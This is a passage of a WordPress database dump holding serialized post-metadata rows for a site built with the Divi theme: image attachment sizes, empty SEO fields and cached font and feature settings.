-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-3-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-3-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:38:\"IMG_20210701_202413_037-3-1024x675.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-3-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-3-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-3-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-3-980x654.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-3-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(596,350,'_wp_attached_file','2021/08/IMG_20210701_202413_037-4.jpg'),(597,350,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:683;s:4:\"file\";s:37:\"2021/08/IMG_20210701_202413_037-4.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-4-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-4-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-4-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:38:\"IMG_20210701_202413_037-4-1024x675.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-4-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-4-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-4-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-4-980x654.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-4-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(609,27,'_aioseo_title',NULL),(610,27,'_aioseo_description',NULL),(611,27,'_aioseo_keywords',''),(612,27,'_aioseo_og_title',NULL),(602,28,'_aioseo_keywords',''),(603,28,'_aioseo_og_title',NULL),(604,28,'_aioseo_og_description',NULL),(605,28,'_aioseo_og_article_section',NULL),(606,28,'_aioseo_og_article_tags',''),(607,28,'_aioseo_twitter_title',NULL),(608,28,'_aioseo_twitter_description',NULL),(613,27,'_aioseo_og_description',NULL),(614,27,'_aioseo_og_article_section',NULL),(615,27,'_aioseo_og_article_tags',''),(616,27,'_aioseo_twitter_title',NULL),(617,27,'_aioseo_twitter_description',NULL),(627,401,'_wp_attached_file','2023/11/Screenshot_20231123_121727_Instagram.jpg'),(628,401,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1079;s:6:\"height\";i:1346;s:4:\"file\";s:48:\"2023/11/Screenshot_20231123_121727_Instagram.jpg\";s:8:\"filesize\";i:706647;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:48:\"Screenshot_20231123_121727_Instagram-240x300.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16825;}s:5:\"large\";a:5:{s:4:\"file\";s:49:\"Screenshot_20231123_121727_Instagram-821x1024.jpg\";s:5:\"width\";i:821;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:126237;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:48:\"Screenshot_20231123_121727_Instagram-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6608;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:48:\"Screenshot_20231123_121727_Instagram-768x958.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:958;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:113833;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:48:\"Screenshot_20231123_121727_Instagram-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21103;}s:31:\"et-pb-post-main-image-fullwidth\";a:5:{s:4:\"file\";s:49:\"Screenshot_20231123_121727_Instagram-1079x675.jpg\";s:5:\"width\";i:1079;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:106087;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:48:\"Screenshot_20231123_121727_Instagram-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24359;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:48:\"Screenshot_20231123_121727_Instagram-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38860;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:48:\"Screenshot_20231123_121727_Instagram-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41245;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:49:\"Screenshot_20231123_121727_Instagram-980x1223.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:1223;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:164969;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:48:\"Screenshot_20231123_121727_Instagram-480x599.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:599;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53726;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(622,26,'_aioseo_og_description',NULL),(623,26,'_aioseo_og_article_section',NULL),(624,26,'_aioseo_og_article_tags',''),(625,26,'_aioseo_twitter_title',NULL),(626,26,'_aioseo_twitter_description',NULL),(629,402,'_wp_attached_file','2023/11/Screenshot_20231123_121916_Instagram.jpg'),(630,402,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1079;s:6:\"height\";i:1346;s:4:\"file\";s:48:\"2023/11/Screenshot_20231123_121916_Instagram.jpg\";s:8:\"filesize\";i:732330;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:48:\"Screenshot_20231123_121916_Instagram-240x300.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16639;}s:5:\"large\";a:5:{s:4:\"file\";s:49:\"Screenshot_20231123_121916_Instagram-821x1024.jpg\";s:5:\"width\";i:821;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:129298;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:48:\"Screenshot_20231123_121916_Instagram-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6835;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:48:\"Screenshot_20231123_121916_Instagram-768x958.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:958;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:115700;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:48:\"Screenshot_20231123_121916_Instagram-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22242;}s:31:\"et-pb-post-main-image-fullwidth\";a:5:{s:4:\"file\";s:49:\"Screenshot_20231123_121916_Instagram-1079x675.jpg\";s:5:\"width\";i:1079;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:115751;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:48:\"Screenshot_20231123_121916_Instagram-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24659;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:48:\"Screenshot_20231123_121916_Instagram-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38146;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:48:\"Screenshot_20231123_121916_Instagram-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40179;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:49:\"Screenshot_20231123_121916_Instagram-980x1223.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:1223;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:171664;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:48:\"Screenshot_20231123_121916_Instagram-480x599.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:599;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52873;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(776,424,'_et_builder_dynamic_assets_loading_attr_threshold','7'),(981,48,'_et_builder_dynamic_assets_loading_attr_threshold','4'),(912,26,'_et_builder_dynamic_assets_loading_attr_threshold','3'),(917,1671,'footnotes',''),(918,424,'_et_pb_content_area_background_color',''),(919,424,'_et_pb_page_z_index','auto'),(920,424,'_et_pb_section_background_color',''),(921,424,'_et_pb_post_settings_title','Services'),(922,424,'_et_pb_post_settings_excerpt',''),(923,424,'_divi_off_canvas_data','a:2:{s:14:\"activeCanvasId\";s:36:\"36d28e61-c319-4eb0-bcad-8390a323d0d6\";s:14:\"mainCanvasName\";s:11:\"Main Canvas\";}'),(929,424,'_et_pb_use_divi_5','on'),(935,1672,'footnotes',''),(2477,1674,'footnotes',''),(34256,1073,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34240,999,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34241,1571,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34242,1571,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34243,1571,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34244,1571,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34245,1471,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34246,1471,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34247,1471,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34248,1471,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34249,1558,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34250,1558,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34251,1558,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34252,1558,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34253,1073,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34254,1073,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34255,1073,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34236,1081,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34237,999,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34238,999,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34239,999,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34232,1427,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34233,1081,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34234,1081,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34235,1081,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34228,1025,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34229,1427,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34230,1427,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0: